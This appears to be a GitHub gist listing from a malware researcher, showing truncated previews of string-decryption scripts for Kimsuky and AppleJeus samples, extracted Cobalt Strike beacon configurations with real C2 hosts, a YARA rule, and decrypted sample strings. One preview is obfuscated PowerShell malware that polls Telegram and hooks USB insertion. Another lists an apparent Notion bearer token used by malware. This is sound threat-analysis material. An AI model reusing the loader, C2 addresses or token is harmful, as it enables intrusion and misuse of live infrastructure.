This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# | |
# Author: @jaydinbas | |
# Decrypt strings found in Kimsuky sample | |
# Reference: https://twitter.com/ShadowChasing1/status/1570601703598338049 | |
# Reference sample: d3930b2494f45bb2c169124d4a39308303b9e8e87043afc54327c1e2a378e4e0 | |
# | |
import re | |
import sys |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Accept-Encoding | |
gzip,deflate | |
Method | |
POST | |
win | |
desktop | |
art-pc | |
/ | |
id= | |
&mail= |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
BeaconType - HTTP | |
Port - 80 | |
SleepTime - 45000 | |
MaxGetSize - 1403644 | |
Jitter - 37 | |
MaxDNS - Not Found | |
PublicKey_MD5 - 005a71d162794e4bc436f8a38e017910 | |
C2Server - 20.203.182.34,/jwquery-3.3.1.min.js | |
UserAgent - Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko | |
HttpPostUri - /jwquery-3.3.2.min.js |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
BeaconType - HTTP | |
Port - 80 | |
SleepTime - 30000 | |
MaxGetSize - 1412693 | |
Jitter - 37 | |
MaxDNS - Not Found | |
PublicKey_MD5 - 319f36ab624b44c836f42decabcfcb6c | |
C2Server - solar.huawei.com,/audiencemanager.js | |
UserAgent - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4044.62 Safari/537.36 | |
HttpPostUri - /audiencemanager-v2.js |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(('[Net.ServicePointManager]::Se'+'curityProtocol=[Net.SecurityProtocolType]::Tls12; | |
NyQErrorActionPreference=zCwContinuezCw; | |
NyQa=zCwap'+'i.telegram.orgzCw; | |
do{Slee'+'p(Get-Random 100)}while'+'((iwr NyQa).StatusCode -ne 20'+'0) | |
NyQ'+'Query = zCwselect * from __InstanceCreationE'+'vent within 5 where Target'+'Instance'+' ISA sn4Win32_LogicalDisk'+'sn4 and TargetInstance.DriveType = 2zCw; | |
Ny'+'QAction = { | |
(gwmi cim_logicaldiskugE?{(NyQ_.drivetype -eq 2)-and(T'+'est-path '+'z'+'CwNyQ(NyQ_.dev'+'iceid)byfzCw)'+'}).DeviceIDugE%'+'{ | |
'+' if(NyQnull'+' -eq NyQ_){return} | |
'+' | |
try{Expand-Archive -Path zCwNyQenv:tempbyfxxx.zipzCw -DestinationPath zCwNyQenv:te'+'mpzCw -force}catch{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# | |
# Author: @jaydinbas | |
# | |
# Custom string decryption used by AppleJeus malware | |
# See https://www.volexity.com/blog/2022/12/01/buyer-beware-fake-cryptocurrency-applications-serving-as-front-for-applejeus-malware/ | |
# | |
# Reference sample: 9352625b3e6a3c998e328e11ad43efb5602fe669aed9c9388af5f55fadfedc78 | |
# Found in function sub_180001830 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
BeaconType - SMB | |
Port - 4444 | |
SleepTime - 10000 | |
MaxGetSize - 2097152 | |
Jitter - 0 | |
MaxDNS - 0 | |
PublicKey_MD5 - 5b37cfe101c82935e6034078db979280 | |
C2Server - | |
UserAgent - | |
HttpPostUri - |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
rule zip_with_ext | |
{ | |
meta: | |
author = "@jaydinbas" | |
description = "Only match zip files containing desired file extensions" | |
strings: | |
$file_sig = "PK\x03\x04" //zip header sig | |
$entry_sig = "PK\x01\x02" //ZIPDIRENTRY sig |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36 | |
c:\windows\system32\ | |
content-type: application/json | |
accept: application/json | |
notion-version: 2022-06-28 | |
authorization: Bearer secret_X92sXCVWoTk63aPgGKlPBBmHVmuKXJ2geugKa7Ogj7s | |
api.notion.com | |
GetProcessImageFileNameA | |
RegOpenKeyExA | |
RegSetValueExA |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
BeaconType - HTTPS | |
Port - 443 | |
SleepTime - 60000 | |
MaxGetSize - 1398104 | |
Jitter - 30 | |
MaxDNS - Not Found | |
PublicKey_MD5 - 4dbaa2821fcfa995554ad7612a869a6d | |
C2Server - exdiy.com,/web/portal | |
UserAgent - Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 | |
HttpPostUri - /logon/index.php |